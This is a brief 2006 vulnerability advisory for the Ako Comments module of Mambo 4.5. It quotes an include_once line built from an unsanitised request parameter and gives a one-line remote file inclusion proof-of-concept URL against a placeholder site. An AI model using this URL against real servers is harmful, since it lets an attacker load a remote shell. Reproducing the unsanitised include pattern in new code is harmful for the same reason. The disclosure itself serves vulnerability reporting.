akoinclude.txt

2006-08-27T00:00:00
ID PACKETSTORM:49386
Type packetstorm
Reporter Outlaw
Modified 2006-08-27T00:00:00

Description

                                        
                                            ` ###########################################################################################  
# Aria-Security.net Advisory #  
# Discovered by: O.U.T.L.A.W #   
  
# < www.Aria-security.net > #  
# Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp #  
# #  
###########################################################################################  
  
  
#Software: Ako Comments (mod)  
#Attack method: Remote File Inclusion   
#Source:  
  
#Description: This module shows users' comments from component AkoComments.  
#File Version: 1.1 for Mambo 4.5  
  
include_once($mosConfig_absolute_path.'/components/com_akocomment/languages/'.$mosConfig_lang.'.php');  
  
  
************************************************************************************  
  
  
#Proof of Concept:   
#http://www.site.com/akocomments.php?mosConfig_absolute_path=shell  
#   
#----------------------------------------------------------   
#   
  
  
#   
#Contact : Outlaw@aria-security.net   
  
  
  
`